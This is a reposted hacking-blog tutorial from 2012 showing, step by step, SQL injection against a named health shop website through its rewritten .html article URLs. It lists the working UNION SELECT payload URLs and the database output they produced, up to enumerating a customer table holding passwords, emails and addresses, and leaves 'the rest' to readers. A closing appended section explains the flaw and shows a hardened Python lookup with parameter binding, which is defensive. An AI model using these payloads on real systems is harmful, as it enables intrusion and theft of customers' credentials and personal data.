Exploiting a Vulnerable Shop with HTML-Style URLs

An old tutorial, but I'm reposting it for newbies.
Exploiting SQL injection in HTML-style URLs

The victim is:

http://www.worldwidehealthcenter.net/articles-261.html

Add a ' after the number:

http://www.worldwidehealthcenter.net…es-261%27.html
It returns an error:
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/whc/www/articles.php on line 16

Warning: Cannot modify header information – headers already sent by (output started at /home/whc/www/articles.php:16) in /home/whc/www/include.php on line 432

Start with order by:

http://www.worldwidehealthcenter.net/articles-261 order by 1– -.html >>ok

http://www.worldwidehealthcenter.net/articles-261 order by 7– -.html >> ok

http://www.worldwidehealthcenter.net/articles-261 order by 8– -.html >> returns an error

>> 8-1=7, so the query has 7 columns

Now union select:

http://www.worldwide…et/articles-261 union select 1,2,3,4,5,6,7– -.html

Ah, no numbers show up; view source shows nothing either.

Try replacing the number with null (261=null):

http://www.worldwidehealthcenter.net/articles-null union select 1,2,3,4,5,6,7– -.html

That works: 2 and 3 are displayed.

Find the information: version(), database(), user()

http://www.worldwidehealthcenter.net/articles-null union select 1,2,version(),4,5,6,7– -.html

Next, find the table names:

http://www.worldwidehealthcenter.net/articles-null union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()– -.html

A whole bunch comes out:

adprice,artcat,articles,banners,brands,bulktemp,categories,clickthrus,concerns,countries,directory,directorybak,directorystats,discount,distributororder,emailaddresses,exchange,iptoc,keywords,loyalty,member,memberbak,memberbak2,message,ocountries,orderitems,orders,ordersbak,postal,practcat,products,productsbak,purchaseorders,retaildiscount,ship,shipdiscount,shipping,states,static,subscribers,suppliers

Find the table that holds the information

There are so many here that I get confused, so let's just go for the member table.

member=0x6d656d626572 (convert to hex)

Now get the columns:

http://www.worldwidehealthcenter.net/articles-null union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_schema=database() and table_name=0x6d656d626572– -.html

Another bunch comes out:

id,password,email,title,firstname,surname,company,address,city,state,postal,shoppercountry,tel,fax,sameshipadd,shiptitle,shipfirstname,shipsurname,shipcompany,shipaddress,shipcity,shipstate,country,shippostal,shiptel,shipfax,advertise,dateemailed,type

That's far enough; everything else is simple, so you guys can do the rest.
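
The behaviour above comes from the fact that the .html URL is not static: whatever sits between articles- and .html is rewritten into a parameter and ends up in the SQL text. The following is an added example, not code from the original post or from the site; it uses Python with an in-memory SQLite table as a constructed stand-in for the PHP/MySQL articles.php, and the function names, route pattern and sample row are assumptions.

```python
import re
import sqlite3


def make_db():
    # Constructed sample data standing in for the site's articles table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO articles VALUES (261, 'Sample article', 'text')")
    return db


def lookup_vulnerable(db, path):
    # Pattern behind the warnings on the page: the rewrite accepts any text
    # between "articles-" and ".html" and the script pastes it into the query.
    raw = re.fullmatch(r"/articles-(.*)\.html", path).group(1)
    sql = "SELECT id, title, body FROM articles WHERE id = " + raw
    return db.execute(sql).fetchall()


# Hardened route (assumed pattern): only 1-9 decimal digits count as an id.
ARTICLE_ROUTE = re.compile(r"/articles-([0-9]{1,9})\.html")


def lookup_hardened(db, path):
    m = ARTICLE_ROUTE.fullmatch(path)
    if m is None:
        return 404, None  # anything else never reaches the database
    # The id is bound as a parameter, so it is data and never SQL text.
    row = db.execute(
        "SELECT id, title, body FROM articles WHERE id = ?", (int(m.group(1)),)
    ).fetchone()
    return (200, row) if row else (404, None)


if __name__ == "__main__":
    db = make_db()
    # Request shapes taken from the page, shortened to the 3 sample columns.
    for p in ("/articles-261.html", "/articles-261'.html",
              "/articles-null union select 1,2,3.html"):
        print(p, "->", lookup_hardened(db, p))
```

In the PHP stack the page shows, the equivalent is a rewrite pattern restricted to digits plus a prepared statement, with display_errors turned off so warnings like the ones quoted above are logged instead of being sent to the visitor.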

About securityforall

it, smile, share for people,...

Posted on May 30, 2012, in Hack SQL Injection.